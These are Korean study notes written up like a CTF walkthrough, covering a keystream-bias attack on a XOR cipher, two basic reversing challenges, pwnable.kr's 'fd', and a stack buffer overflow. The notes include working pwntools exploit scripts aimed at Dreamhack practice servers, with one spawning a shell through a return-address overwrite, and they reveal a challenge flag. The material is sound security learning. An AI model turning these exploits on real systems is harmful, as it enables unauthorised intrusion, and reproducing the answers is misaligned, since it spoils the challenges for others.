[CAUTION] 스터디 - 10

💡 Caution 스터디 10회차

암호학 - 1

CS448

def encrypt(s, k):
    res = ""
    if k <= len(s):
        _print("[!] key shold be larger then len(pt) for safty!!")
        return ""
    for i, c in enumerate(s):
        enc = (get_random_u8() + key * i) % 0xff
        enc = ord(c) ^ enc
        res += hex(enc)[2:].rjust(2, "0")
    return res

위의 코드와 같은 방식으로 암호화를 수행한다.

취약점이 발생하는 부분은 %0xff 이다.

key stream : (get_random_u8() + key * i) % 0xff 부분을 잘 생각해 보면 그 결과로 0~254 까지의 결과가 나오는 것을 알 수 있다.

이것이 왜 문제인지 생각해보자. 임의의 평문 ‘X’에 대해서 암호화를 통해서 나올 수 있는 모든 결과는 8bit 결과이므로 00000000 ~ 11111111 로 총 256개이다.

근데 현재 키 스트림은 0~254까지의 범위를 가지므로 255개의 키 스트림이 있다.

즉, 임의의 문자 ‘X’에 대해서 계속 암호화를 수행하면 ‘X’ xor ‘11111111’ 의 결과가 누락되게 된다.

그러면 우리는 하나의 글자에 대해서 계속 암호화를 수행하면서 어떠한 결과가 나왔는지를 전부 기록한 뒤에, 0-255중에 한 번도 안나온 결과를 찾으면 된다. 그러면 그 숫자가 바로 ‘X’ xor ‘11111111’이 되는 것이다.

이를 코드로 구현하면 다음과 같다. 모든 flag 하나하나에 대해서 bruteforce를 하다보니, 결과가 나오는데 시간이 꽤 걸린다.

from pwn import *


p = remote('host1.dreamhack.games',10819)

key = 255

p.sendlineafter('>> ','3')
p.sendlineafter('key >> ','255')
p.recvuntil('result : ')

enc_flag = p.recvline()
flag_len = len(enc_flag) // 2
flag_set = [list(range(256)) for _ in range(flag_len)]
flag = [0 for x in range(flag_len)]

while True:
    p.sendlineafter('>> ','3')
    p.sendlineafter('key >> ','255')
    p.recvuntil('result : ')
    
    enc_flag = bytes.fromhex(p.recvline()[:-1].decode())

    for i in range(flag_len):
        # flag_set에서 찾는 글자 하나씩 삭제
        if flag_set[i].count(enc_flag[i]) == 1:
            flag_set[i].remove(enc_flag[i])
        
        # 한개 남은 결과에 255 xor 하면 원래 글자
        if len(flag_set[i]) == 1:
            flag[i] = chr(flag_set[i][-1] ^ key )

    print([len(x) for x in flag_set])    
    if 0 not in flag:
        break
            
print(''.join(flag))

리버싱 - 1

rev-basic-0

리버싱 기초문제

IDA로 열면 바로 strcmp가 보임

리버싱 - 2

rev-basic-2

각각의 input(a1)에 대해서, aC[] 배열과 비교를 하고 있다. 총 길이는 18글자 이며, aC배열은 다음과 같다.

데이터 타입을 array로 바꾸면 더 보기 쉽다.

마지막 null문자를 제외하면 총 17글자로 flag는 ‘Comp4re_the_arr4y’이다.

시스템 - 1

pwnable.kr [fd]

문제의 코드는 다음과 같다.

char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2){
		printf("pass argv[1] a number\n");
		return 0;
	}
	int fd = atoi( argv[1] ) - 0x1234;
	int len = 0;
	len = read(fd, buf, 32);
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;

}

argv[1] - 0x1234 값을 fd로 하여 해당 fd로 데이터를 읽어온다.

stdin 이 fd 0 이므로 argv[1]로 0x1234인 4660 데이터를 넘겨준다.

넘겨주면 사용자의 입력값을 기다리게 되고, 이때 비교 문자열인 ‘LETMEIN’을 입력해 주면 flag를 획득할 수 있다.

시스템 - 2

Return Address Overwrite 메인함수를 시작할때 스택 상태는 아래와 같다

그림으로 표현해보면 스택 상태는 다음과 같다

buf에 입력 받을때 bof 취약점이 있으니, 56byte는 더미로 채워주고 8 byte를 get_shell() 함수의 주소를 입력하여 익스플로잇 한다.

get_shell()의 주소는 다음과 같다.

쉘 코드는 다음과 같이 작성해 준다.

from pwn import *

p = remote('host1.dreamhack.games',21598)
context.log_level= 0

# get_shell() : 0x00000000004006aa
p.recvuntil(b'Input: ')
payload = 'A' * 0x30
payload += 'B' * 8
payload += '\xaa\x06\x40\x00\x00\x00\x00\x00'

p.sendline(payload)
p.interactive()

실행하면 다음과 같이 플래그를 획득할 수 있다.